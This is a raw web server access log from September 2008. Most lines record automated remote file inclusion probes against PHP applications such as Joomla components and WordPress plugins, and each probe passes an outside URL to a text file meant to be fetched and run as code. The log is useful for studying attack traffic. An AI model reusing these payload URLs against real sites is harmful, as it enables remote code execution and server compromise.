62.87.154.41 - - [06/Sep/2008:01:59:41 -0400] "GET /logs/access_log.Q108081300//atom.php5?page=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:01:59:41 -0400] "GET /logs//atom.php5?page=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:01:59:42 -0400] "GET /logs/error_log.Q108081300//atom.php5?page=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:01:59:42 -0400] "GET //atom.php5?page=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
151.11.24.250 - - [06/Sep/2008:02:00:01 -0400] "GET /logs/access_log.Q108071700%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
216.193.201.201 - - [06/Sep/2008:02:01:25 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.76"
216.193.201.201 - - [06/Sep/2008:02:01:25 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.76"
216.193.201.201 - - [06/Sep/2008:02:01:25 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.76"
209.59.12.99 - - [06/Sep/2008:02:01:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.150.189.10 - - [06/Sep/2008:02:01:52 -0400] "GET /logs/access_log.Q108082600/scanhttp://www.governador.xpg.com.br/idd.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.76"
122.153.21.133 - - [06/Sep/2008:02:03:54 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
81.169.162.47 - - [06/Sep/2008:02:03:54 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:02:03:54 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
122.153.21.133 - - [06/Sep/2008:02:03:54 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
122.153.21.133 - - [06/Sep/2008:02:03:55 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
216.193.201.201 - - [06/Sep/2008:02:05:39 -0400] "GET /logs/error_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
58.227.192.80 - - [06/Sep/2008:02:06:20 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/4.61 [en] (OS/2; U)"
58.227.192.80 - - [06/Sep/2008:02:06:20 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
209.59.12.99 - - [06/Sep/2008:02:06:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.30.125.3 - - [06/Sep/2008:02:06:28 -0400] "GET /logs/access_log.Q108062300 HTTP/1.0" 200 3342303 "http://search.yahoo.com/search;_ylt=A0geu4p2C79I36MASVql87UF?p=www.192.168.23.245.&ei=UTF-8&iscqry=&fr=ush-mailc&fr2=sfp" "Opera/9.27 (Windows NT 5.1; U; en)"
222.122.160.145 - - [06/Sep/2008:02:07:38 -0400] "GET /logs///vwar/backup/errors.php?error=http://sajt.ba/test/license.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.160.145 - - [06/Sep/2008:02:07:38 -0400] "GET /logs/error_log.Q108082300///vwar/backup/errors.php?error=http://sajt.ba/test/license.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.160.145 - - [06/Sep/2008:02:07:46 -0400] "GET /logs/access_log.Q108082300///vwar/backup/errors.php?error=http://sajt.ba/test/license.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.53.39.34 - - [06/Sep/2008:02:08:39 -0400] "GET /logs/error_log.Q108052100/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
74.53.39.34 - - [06/Sep/2008:02:08:41 -0400] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
74.53.39.34 - - [06/Sep/2008:02:08:42 -0400] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
122.153.21.133 - - [06/Sep/2008:02:11:36 -0400] "GET /logs/access_log.Q108082700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
122.153.21.133 - - [06/Sep/2008:02:11:36 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
122.153.21.133 - - [06/Sep/2008:02:11:37 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Sep/2008:02:11:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.39.34 - - [06/Sep/2008:02:12:43 -0400] "GET /logs/error_log.Q108072800/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
209.250.238.63 - - [06/Sep/2008:02:13:14 -0400] "GET /logs/access_log.Q108080900///modules/TotalCalendar/config.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
209.250.238.63 - - [06/Sep/2008:02:13:16 -0400] "GET ///modules/TotalCalendar/config.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.813"
209.250.238.63 - - [06/Sep/2008:02:13:17 -0400] "GET /logs///modules/TotalCalendar/config.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
209.250.238.63 - - [06/Sep/2008:02:13:24 -0400] "GET /logs/access_log.Q108081700///modules/TotalCalendar/config.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
72.55.148.240 - - [06/Sep/2008:02:14:12 -0400] "GET /logs/error_log.Q108081800//include/lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:14:18 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:14:18 -0400] "GET //include/lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:15:02 -0400] "GET /logs/error_log.Q108082300//include/lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
74.6.17.183 - - [06/Sep/2008:02:14:59 -0400] "GET /logs/access_log.Q108050700 HTTP/1.0" 200 4724462 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:02:16:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.70.99.218 - - [06/Sep/2008:02:16:55 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
24.70.99.218 - - [06/Sep/2008:02:16:56 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
24.70.99.218 - - [06/Sep/2008:02:16:56 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
74.6.18.229 - - [06/Sep/2008:02:18:01 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.229 - - [06/Sep/2008:02:18:02 -0400] "GET /logs/error_log.Q108071500 HTTP/1.0" 200 315446 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.148.240 - - [06/Sep/2008:02:18:34 -0400] "GET /logs/access_log.Q108061500//components/errors.php?error=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:18:34 -0400] "GET //components/errors.php?error=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:18:34 -0400] "GET /logs//components/errors.php?error=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
81.23.226.2 - - [06/Sep/2008:02:18:59 -0400] "GET /logs/error_log.Q108081500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.67"
81.23.226.2 - - [06/Sep/2008:02:18:59 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.67"
81.23.226.2 - - [06/Sep/2008:02:19:00 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.67"
62.87.154.41 - - [06/Sep/2008:02:19:20 -0400] "GET /logs//ashnews.php?pathtoashnews=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:02:19:20 -0400] "GET //ashnews.php?pathtoashnews=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.87.154.41 - - [06/Sep/2008:02:19:20 -0400] "GET /logs/access_log.Q108070500//ashnews.php?pathtoashnews=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
64.246.42.3 - - [06/Sep/2008:02:20:09 -0400] "GET /logs/error_log.Q108052700/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:02:20:09 -0400] "GET /errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:02:20:09 -0400] "GET /logs/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.64"
24.70.99.218 - - [06/Sep/2008:02:20:20 -0400] "GET /logs/error_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
151.11.24.250 - - [06/Sep/2008:02:20:24 -0400] "GET //include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:02:20:24 -0400] "GET /logs/access_log.Q108082600//include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:02:20:24 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:02:20:27 -0400] "GET /logs/access_log.Q108082300//include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
72.55.148.240 - - [06/Sep/2008:02:20:56 -0400] "GET /logs/error_log.Q108081500//components/errors.php?error=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
81.23.226.2 - - [06/Sep/2008:02:21:00 -0400] "GET /logs/access_log.Q108081500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.67"
62.87.154.41 - - [06/Sep/2008:02:21:31 -0400] "GET /logs/access_log.Q108082400//ashnews.php?pathtoashnews=http://amik69.jw.lt/readme.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.12.99 - - [06/Sep/2008:02:21:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.70.99.218 - - [06/Sep/2008:02:21:56 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
88.168.106.155 - - [06/Sep/2008:02:22:00 -0400] "GET /logs/access_log.Q108082400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.xtos.org/images/img??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:03 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.xtos.org/images/img??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:04 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.xtos.org/images/img??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:04 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:09 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:09 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:20 -0400] "GET /logs/access_log.Q108061500//components/errors.php?error=http://www.xtos.org/images/img??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:22:36 -0400] "GET /logs//components/errors.php?error=http://www.xtos.org/images/img??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
64.246.42.3 - - [06/Sep/2008:02:23:18 -0400] "GET /logs/error_log.Q108052900/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.64"
81.169.162.47 - - [06/Sep/2008:02:24:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:02:24:11 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
60.50.149.112 - - [06/Sep/2008:02:24:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; IEMB3)"
60.50.149.112 - - [06/Sep/2008:02:24:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; IEMB3)"
151.11.24.250 - - [06/Sep/2008:02:24:37 -0400] "GET /logs/error_log.Q108081800//include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
60.50.149.112 - - [06/Sep/2008:02:24:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; IEMB3)"
60.50.149.112 - - [06/Sep/2008:02:24:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; IEMB3)"
151.11.24.250 - - [06/Sep/2008:02:24:44 -0400] "GET /logs/error_log.Q108082300//include/lib.inc.php?site_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
72.55.148.240 - - [06/Sep/2008:02:25:01 -0400] "GET /logs/access_log.Q108062600//include/bbs.lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:07 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:11 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:20 -0400] "GET /logs/access_log.Q108082400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:21 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:21 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:25 -0400] "GET /logs/error_log.Q108082500/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:26 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:26 -0400] "GET /logs/error_log.Q108082500%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:25:27 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
67.212.173.42 - - [06/Sep/2008:02:25:49 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
67.212.173.42 - - [06/Sep/2008:02:25:50 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
67.212.173.42 - - [06/Sep/2008:02:25:50 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
122.153.21.133 - - [06/Sep/2008:02:26:25 -0400] "GET /logs/access_log.Q108082600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ellinotopos.com/idxx.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Sep/2008:02:26:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.183 - - [06/Sep/2008:02:27:25 -0400] "GET /logs/access_log.Q108021100 HTTP/1.0" 200 3830537 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.148.240 - - [06/Sep/2008:02:27:53 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:28:48 -0400] "GET /logs/access_log.Q108082700//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
88.168.106.155 - - [06/Sep/2008:02:29:26 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
88.168.106.155 - - [06/Sep/2008:02:30:14 -0400] "GET /logs/error_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.xtos.org/images/img??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
64.246.42.3 - - [06/Sep/2008:02:30:27 -0400] "GET /logs/error_log.Q108070500/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:02:30:27 -0400] "GET /errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:02:30:27 -0400] "GET /logs/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:02:31:10 -0400] "GET /logs/error_log.Q108070600/errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.64"
68.173.175.222 - - [06/Sep/2008:02:31:34 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.173.175.222 - - [06/Sep/2008:02:31:31 -0400] "GET /logs/access_log.Q108012900 HTTP/1.1" 200 4545391 "http://ww23.rr.com/index.php?origURL=http://36382.jpg/" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
209.59.12.99 - - [06/Sep/2008:02:31:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.173.42 - - [06/Sep/2008:02:32:00 -0400] "GET /logs/error_log.Q108082500//pjsfiles/delete.php?installed_config_file=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.814"
67.212.173.42 - - [06/Sep/2008:02:32:00 -0400] "GET //pjsfiles/delete.php?installed_config_file=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.814"
67.212.173.42 - - [06/Sep/2008:02:32:00 -0400] "GET /logs//pjsfiles/delete.php?installed_config_file=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.814"
67.212.173.42 - - [06/Sep/2008:02:32:19 -0400] "GET /logs/access_log.Q108082700//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
201.6.251.5 - - [06/Sep/2008:02:32:38 -0400] "GET /logs/error_log.Q108070600//errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:02:32:38 -0400] "GET //errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:02:32:39 -0400] "GET /logs//errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
201.6.251.5 - - [06/Sep/2008:02:32:40 -0400] "GET /logs/error_log.Q108081300//errors.php?error=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
63.145.12.234 - - [06/Sep/2008:02:32:52 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
72.55.148.240 - - [06/Sep/2008:02:33:27 -0400] "GET /logs/access_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:33:30 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
72.55.148.240 - - [06/Sep/2008:02:33:30 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
72.29.65.194 - - [06/Sep/2008:02:34:44 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
